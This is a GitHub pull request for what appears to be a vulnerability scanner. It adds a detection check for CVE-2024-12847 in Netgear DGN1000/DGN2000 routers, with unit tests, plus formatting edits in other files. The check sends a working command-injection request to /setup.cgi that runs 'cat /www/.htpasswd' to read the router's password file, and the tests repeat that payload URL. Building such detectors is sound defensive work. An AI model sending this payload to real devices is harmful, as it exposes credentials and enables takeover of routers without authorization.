Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add detection for CVE-2024-12847 #168

Merged
merged 7 commits into from
Jan 13, 2025
Merged
Show file tree
Hide file tree
Changes from 6 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion agent/exploits/cve_2019_12989.py
Original file line number Diff line number Diff line change
Expand Up @@ -108,7 +108,7 @@ def _create_vulnerability(
targeted_by_nation_state=True,
)
technical_detail = (
f"{target.origin} is vulnerable to " f"CVE-2019-12989 and CVE-2019-12991"
f"{target.origin} is vulnerable to CVE-2019-12989 and CVE-2019-12991"
)
vulnerability = definitions.Vulnerability(
entry=entry,
Expand Down
74 changes: 74 additions & 0 deletions agent/exploits/cve_2024_12847.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,74 @@
"""Agent Asteroid implementation for CVE-2024-12847"""

import datetime
import logging

from requests import exceptions as requests_exceptions

from agent import definitions
from agent import exploits_registry
from agent.exploits import webexploit

VULNERABILITY_TITLE = "Netgear DGN1000/DGN2000 Unauthenticated RCE"
VULNERABILITY_REFERENCE = "CVE-2024-12847"
VULNERABILITY_DESCRIPTION = (
"Netgear DGN1000 and DGN2000 routers contain an unauthenticated remote code execution "
"vulnerability in the setup.cgi script. The syscmd function allows execution of "
"arbitrary commands."
)
RISK_RATING = "CRITICAL"
DEFAULT_TIMEOUT = datetime.timedelta(seconds=90)

COMMAND = "cat+/www/.htpasswd"
ENDPOINT = "/setup.cgi"
KEYWORD = "admin"


@exploits_registry.register
class NetgearDGNCommandInjectionExploit(webexploit.WebExploit):
"""
CVE-2024-12847: Netgear DGN1000/DGN2000 Unauthenticated RCE
"""

metadata = definitions.VulnerabilityMetadata(
title=VULNERABILITY_TITLE,
description=VULNERABILITY_DESCRIPTION,
reference=VULNERABILITY_REFERENCE,
risk_rating=RISK_RATING,
)

def accept(self, target: definitions.Target) -> bool:
try:
resp = self.session.get(
target.origin + ENDPOINT, timeout=DEFAULT_TIMEOUT.seconds
)
except requests_exceptions.RequestException:
return False
if resp.status_code == 200:
return True
return False

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"""Rule to detect command injection vulnerability on a target."""
vulnerabilities: list[definitions.Vulnerability] = []

try:
resp = self.session.get(
f"{target.origin}{ENDPOINT}",
params={
"next_file": "netgear.cfg",
"todo": "syscmd",
"cmd": COMMAND,
"curpath": "/",
"currentsetting.htm": "1",
},
timeout=DEFAULT_TIMEOUT.seconds,
)

if resp.status_code == 200 and KEYWORD in resp.text:
vulnerabilities.append(self._create_vulnerability(target))

except requests_exceptions.RequestException as e:
logging.error("Command injection detection failed: %s", e)

return vulnerabilities
3 changes: 1 addition & 2 deletions agent/exploits/cve_2024_8522.py
Original file line number Diff line number Diff line change
Expand Up @@ -59,8 +59,7 @@ def _create_vulnerability(target: definitions.Target) -> definitions.Vulnerabili
targeted_by_nation_state=False,
)
technical_detail = (
f"{target} is vulnerable to {VULNERABILITY_REFERENCE}, "
f"{VULNERABILITY_TITLE}"
f"{target} is vulnerable to {VULNERABILITY_REFERENCE}, {VULNERABILITY_TITLE}"
)
vulnerability = definitions.Vulnerability(
entry=entry,
Expand Down
100 changes: 100 additions & 0 deletions tests/exploits/cve_2024_12847_test.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,100 @@
"""Unit tests for CVE-2024-12847"""

import requests_mock as req_mock
from requests import exceptions as requests_exceptions

from agent import definitions
from agent.exploits import cve_2024_12847


def testNetgearDGNCommandInjection_whenVulnerable_reportFinding(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when target is vulnerable to command injection."""
requests_mock.get(
"http://localhost:80/setup.cgi",
status_code=200,
)

requests_mock.get(
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%2B%2Fwww%2F.htpasswd&curpath=%2F&currentsetting.htm=1",
text="admin:$1$12345678$ABCDEFGHIJKLMNOPQRSTUVWX",
status_code=200,
)

exploit_instance = cve_2024_12847.NetgearDGNCommandInjectionExploit()
target = definitions.Target("http", "localhost", 80)

accept = exploit_instance.accept(target)
vulnerabilities = exploit_instance.check(target)

assert accept is True
assert len(vulnerabilities) > 0
vulnerability = vulnerabilities[0]
assert vulnerability.entry.title == "Netgear DGN1000/DGN2000 Unauthenticated RCE"
assert vulnerability.entry.risk_rating == "CRITICAL"


def testNetgearDGNCommandInjection_whenNotNetgear_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when target is not a Netgear device."""
requests_mock.get(
"http://localhost:80/setup.cgi",
status_code=200,
)

requests_mock.get(
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%2B%2Fwww%2F.htpasswd&curpath=%2F&currentsetting.htm=1",
status_code=401,
)

exploit_instance = cve_2024_12847.NetgearDGNCommandInjectionExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)
accept = exploit_instance.accept(target)

assert accept is True
assert len(vulnerabilities) == 0


def testNetgearDGNCommandInjection_whenCommandFails_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when command injection fails."""
requests_mock.get(
"http://localhost:80/setup.cgi",
headers={"WWW-Authenticate": "DGN1000"},
status_code=401,
)

requests_mock.get(
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1",
text="",
status_code=200,
)

exploit_instance = cve_2024_12847.NetgearDGNCommandInjectionExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0


def testNetgearDGNCommandInjection_requestException_handlingErrorLogged(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: handle RequestException in command injection detection."""
requests_mock.get(
"http://localhost:80/setup.cgi",
exc=requests_exceptions.RequestException("Simulated connection error"),
)

exploit_instance = cve_2024_12847.NetgearDGNCommandInjectionExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0
18 changes: 9 additions & 9 deletions tests/exploits/cve_2024_6387_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -20,9 +20,9 @@ def testAcceptExploit_whenVulnerableBanner_shouldReturnTrue(

accept = exploit_instance.accept(target)

assert (
accept is True
), f"Expected vulnerability detection for IP address {target.origin}, but accept returned False"
assert accept is True, (
f"Expected vulnerability detection for IP address {target.origin}, but accept returned False"
)


@patch("agent.exploits.cve_2024_6387.get_ssh_banner")
Expand Down Expand Up @@ -61,9 +61,9 @@ def testCheckExploit_whenVulnerable_shouldReportFinding(

vulnerabilities = exploit_instance.check(target)

assert (
len(vulnerabilities) > 0
), f"Expected vulnerabilities for IP address {target.origin}, but found none"
assert len(vulnerabilities) > 0, (
f"Expected vulnerabilities for IP address {target.origin}, but found none"
)


@patch("agent.exploits.cve_2024_6387.get_ssh_banner")
Expand All @@ -81,6 +81,6 @@ def testCheckExploit_whenSafe_shouldReportNothing(

vulnerabilities = exploit_instance.check(target)

assert (
len(vulnerabilities) == 0
), f"Expected no vulnerabilities for IP address {target.origin}, but found {len(vulnerabilities)}"
assert len(vulnerabilities) == 0, (
f"Expected no vulnerabilities for IP address {target.origin}, but found {len(vulnerabilities)}"
)
48 changes: 24 additions & 24 deletions tests/exploits/cve_2024_6633_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -58,9 +58,9 @@ def testIsPortOpen_whenPortIsOpen_reportTrue(mock_socket: mock.MagicMock) -> Non

result = cve_2024_6633._is_port_open("192.168.1.1", 4406)

assert (
result is True
), f"Expected True, but got {result}. The port should be reported as open."
assert result is True, (
f"Expected True, but got {result}. The port should be reported as open."
)


@mock.patch("agent.exploits.cve_2024_6633.socket.socket")
Expand All @@ -71,9 +71,9 @@ def testIsPortOpen_whenPortIsClosed_reportFalse(mock_socket: mock.MagicMock) ->

result = cve_2024_6633._is_port_open("192.168.1.1", 4406)

assert (
result is False
), f"Expected False, but got {result}. The port should be reported as closed."
assert result is False, (
f"Expected False, but got {result}. The port should be reported as closed."
)


@mock.patch("agent.exploits.cve_2024_6633.jaydebeapi.connect")
Expand Down Expand Up @@ -106,9 +106,9 @@ def testAttemptDbConnection_whenConnectionFails_reportFalse(
"Database error occurred while connecting: %s", mock.ANY
)
error_message = mock_logger.error.call_args[0][1]
assert "Test DB error" in str(
error_message
), "Error message should contain the specific database error"
assert "Test DB error" in str(error_message), (
"Error message should contain the specific database error"
)


@mock.patch("agent.exploits.cve_2024_6633.jaydebeapi.connect")
Expand All @@ -129,9 +129,9 @@ def testAttemptDbConnection_whenJavaExceptionOccurs_reportFalse(
"Database error occurred while connecting: %s", mock.ANY
)
error_message = mock_logger.error.call_args[0][1]
assert "java.sql.SQLTransientConnectionException" in str(
error_message
), "Error message should contain the specific Java exception"
assert "java.sql.SQLTransientConnectionException" in str(error_message), (
"Error message should contain the specific Java exception"
)


@mock.patch("agent.exploits.cve_2024_6633.socket.socket")
Expand All @@ -144,9 +144,9 @@ def testIsPortOpen_whenSocketErrorOccurs_reportFalse(

result = cve_2024_6633._is_port_open("192.168.1.1", 4406)

assert (
result is False
), f"Expected False, but got {result}. The function should return False when a socket.error occurs."
assert result is False, (
f"Expected False, but got {result}. The function should return False when a socket.error occurs."
)


def testDetectVulnerability_whenPortOpenAndVulnerable_reportTrue() -> None:
Expand All @@ -159,9 +159,9 @@ def testDetectVulnerability_whenPortOpenAndVulnerable_reportTrue() -> None:
):
result = cve_2024_6633._detect_vulnerability("192.168.1.1")

assert (
result is True
), f"Expected True, but got {result}. The function should return True when the target is vulnerable."
assert result is True, (
f"Expected True, but got {result}. The function should return True when the target is vulnerable."
)


def testDetectVulnerability_whenPortOpenButNotVulnerable_reportFalse() -> None:
Expand All @@ -174,16 +174,16 @@ def testDetectVulnerability_whenPortOpenButNotVulnerable_reportFalse() -> None:
):
result = cve_2024_6633._detect_vulnerability("192.168.1.1")

assert (
result is False
), f"Expected False, but got {result}. The function should return False when the target is not vulnerable."
assert result is False, (
f"Expected False, but got {result}. The function should return False when the target is not vulnerable."
)


def testDetectVulnerability_whenPortClosed_reportFalse() -> None:
"""Test _detect_vulnerability when the port is closed."""
with mock.patch("agent.exploits.cve_2024_6633._is_port_open", return_value=False):
result = cve_2024_6633._detect_vulnerability("192.168.1.1")

assert (
result is False
), f"Expected False, but got {result}. The function should return False when the port is closed."
assert result is False, (
f"Expected False, but got {result}. The function should return False when the port is closed."
)
12 changes: 6 additions & 6 deletions tests/exploits/cve_2024_6745_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -25,9 +25,9 @@ def testCVE20246745_whenVulnerable_reportFinding(
exploit_instance = cve_2024_6745.SimpleTicketBookingSQLInjectionExploit()
target = definitions.Target("http", "example.com", 80)

assert (
exploit_instance.accept(target) is True
), "The target should be reported as vulnerable."
assert exploit_instance.accept(target) is True, (
"The target should be reported as vulnerable."
)

vulnerabilities = exploit_instance.check(target)
vulnerability = vulnerabilities[0]
Expand Down Expand Up @@ -57,9 +57,9 @@ def testCVE20246745_whenSafe_reportNothing(requests_mock: req_mock.Mocker) -> No
exploit_instance = cve_2024_6745.SimpleTicketBookingSQLInjectionExploit()
target = definitions.Target("http", "example.com", 80)

assert (
exploit_instance.accept(target) is True
), "The target should be reported as safe."
assert exploit_instance.accept(target) is True, (
"The target should be reported as safe."
)

vulnerabilities = exploit_instance.check(target)

Expand Down
12 changes: 6 additions & 6 deletions tests/exploits/cve_2024_7589_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -59,9 +59,9 @@ def testCheckExploit_whenVulnerable_shouldReportFinding(

vulnerabilities = exploit_instance.check(target)

assert (
len(vulnerabilities) > 0
), f"Expected vulnerabilities for IP address {target.origin}, but found none"
assert len(vulnerabilities) > 0, (
f"Expected vulnerabilities for IP address {target.origin}, but found none"
)


@patch("agent.exploits.cve_2024_7589.get_ssh_banner")
Expand All @@ -79,6 +79,6 @@ def testCheckExploit_whenSafe_shouldReportNothing(

vulnerabilities = exploit_instance.check(target)

assert (
len(vulnerabilities) == 0
), f"Expected no vulnerabilities for IP address {target.origin}, but found {len(vulnerabilities)}"
assert len(vulnerabilities) == 0, (
f"Expected no vulnerabilities for IP address {target.origin}, but found {len(vulnerabilities)}"
)
6 changes: 3 additions & 3 deletions tests/exploits_registry_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,6 @@ def testExploitsRegistry_allExploits_mustBeRegisteredOnce() -> None:

cnt = collections.Counter(exploits_registry.ExploitsRegistry().values())

assert all(
v == 1 for v in cnt.values()
), f"Found {[(k, v) for k, v in cnt.items() if v > 1]}"
assert all(v == 1 for v in cnt.values()), (
f"Found {[(k, v) for k, v in cnt.items() if v > 1]}"
)
Loading